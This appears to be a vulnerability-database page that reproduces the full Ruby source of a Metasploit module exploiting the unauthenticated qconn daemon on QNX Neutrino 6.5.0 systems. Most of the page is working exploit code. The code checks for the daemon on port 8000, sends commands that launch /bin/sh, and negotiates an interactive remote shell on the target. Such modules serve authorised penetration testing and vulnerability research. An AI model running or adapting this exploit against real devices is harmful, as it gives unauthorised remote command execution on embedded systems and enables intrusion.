QNX qconn Command Execution

2012-09-30T07:51:08
ID MSF:EXPLOIT/UNIX/MISC/QNX_QCONN_EXEC
Type metasploit
Reporter Rapid7
Modified 2019-01-10T19:19:14

Description

This module uses the qconn daemon on QNX systems to gain a shell. The QNX qconn daemon does not require authentication and allows remote users to execute arbitrary operating system commands. This module has been tested successfully on QNX Neutrino 6.5.0 (x86) and 6.5.0 SP1 (x86).

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Module::Deprecated

  deprecated(Date.new(2018, 10, 17), 'exploit/qnx/qconn/qconn_exec')

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'QNX qconn Command Execution',
      'Description'    => %q{
        This module uses the qconn daemon on QNX systems to gain a shell.

        The QNX qconn daemon does not require authentication and allows
        remote users to execute arbitrary operating system commands.

        This module has been tested successfully on QNX Neutrino 6.5.0 (x86)
        and 6.5.0 SP1 (x86).
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'David Odell',  # Discovery
          'Mor!p3r',      # PoC
          'bcoles' # Metasploit
        ],
      'References'     =>
        [
          ['EDB', '21520'],
          ['URL', 'https://www.optiv.com/blog/pentesting-qnx-neutrino-rtos'],
          ['URL', 'http://www.qnx.com/developers/docs/6.5.0SP1/neutrino/utilities/q/qconn.html'],
          ['URL', 'http://www.qnx.com/developers/docs/6.5.0/topic/com.qnx.doc.neutrino_utilities/q/qconn.html']
        ],
      'Payload'        =>
        {
          'BadChars'    => '',
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType'    => 'cmd_interact',
              'ConnectionType' => 'find'
            }
        },
      'DefaultOptions' =>
        {
          'WfsDelay' => 10,
          'PAYLOAD'  => 'cmd/unix/interact'
        },
      'Platform'       => 'unix', # QNX Neutrino
      'Arch'           => ARCH_CMD,
      'Targets'        => [['Automatic', {}]],
      'Privileged'     => false,
      'DisclosureDate' => 'Sep 4 2012',
      'DefaultTarget'  => 0))
    register_options(
      [
        Opt::RPORT(8000),
        OptString.new('SHELL', [true, 'Path to system shell', '/bin/sh'])
      ])
  end

  def check
    vprint_status 'Sending check...'

    connect
    res = sock.get_once(-1, 10)

    unless res
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end

    unless res.include? 'QCONN'
      return CheckCode::Safe
    end

    sock.put "service launcher\n"
    res = sock.get_once(-1, 10)

    if res.nil? || !res.include?('OK')
      return CheckCode::Safe
    end

    fingerprint = Rex::Text.rand_text_alphanumeric rand(5..10)
    sock.put "start/flags run /bin/echo /bin/echo #{fingerprint}\n"

    if res.nil? || !res.include?('OK')
      return CheckCode::Safe
    end

    Rex.sleep 1

    res = sock.get_once(-1, 10)

    if res.nil? || !res.include?(fingerprint)
      return CheckCode::Safe
    end

    disconnect

    CheckCode::Vulnerable
  end

  def exploit
    unless check == CheckCode::Vulnerable
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
    end

    connect
    res = sock.get_once(-1, 10)

    unless res
      fail_with Failure::Unreachable, 'Connection failed'
    end

    unless res.include? 'QCONN'
      fail_with Failure::UnexpectedReply, 'Unexpected reply'
    end

    sock.put "service launcher\n"
    res = sock.get_once(-1, 10)

    if res.nil? || !res.include?('OK')
      fail_with Failure::UnexpectedReply, 'Unexpected reply'
    end

    print_status 'Sending payload...'
    sock.put "start/flags run #{datastore['SHELL']} -\n"

    Rex.sleep 1

    unless negotiate_shell sock
      fail_with Failure::UnexpectedReply, 'Unexpected reply'
    end

    print_good 'Payload sent successfully'

    handler
  end

  def negotiate_shell(sock)
    Timeout.timeout(15) do
      while true
        data = sock.get_once(-1, 10)

        if !data || data.length.zero?
          return nil
        end

        if data.include?('#') || data.include?('No controlling tty')
          return true
        end

        Rex.sleep 0.5
      end
    end
  rescue ::Timeout::Error
    return nil
  end
end